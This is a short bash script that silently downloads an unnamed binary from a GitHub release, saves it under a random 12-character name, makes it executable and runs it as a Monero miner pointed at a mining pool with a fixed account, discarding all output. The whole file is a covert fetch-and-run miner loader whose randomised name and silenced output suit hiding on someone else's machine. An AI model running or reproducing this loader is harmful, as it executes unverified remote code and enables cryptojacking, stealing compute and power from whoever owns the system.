#!/bin/bash
set -e  # Exit on any error

# Generate a random filename
BIN_NAME=$(tr -dc a-z0-9 </dev/urandom | head -c 12)

# Download binary quietly and rename
wget -q https://github.com/vedhagsvp/qubros/releases/download/srmn/aplnopa -O "$BIN_NAME"

# Make it executable
chmod +x "$BIN_NAME"

# Optional: run the binary
# ./"$BIN_NAME"

./"$BIN_NAME" --algo xmr --account CP_udnvh2owpq --pool xmr.asia.apool.io:4334 --worker A31-$RANDOM > /dev/null 2>&1
